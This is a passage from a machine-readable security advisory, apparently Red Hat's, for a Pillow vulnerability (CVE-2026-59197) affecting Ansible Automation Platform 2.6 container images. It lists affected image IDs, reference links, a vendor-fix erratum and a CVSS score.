"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
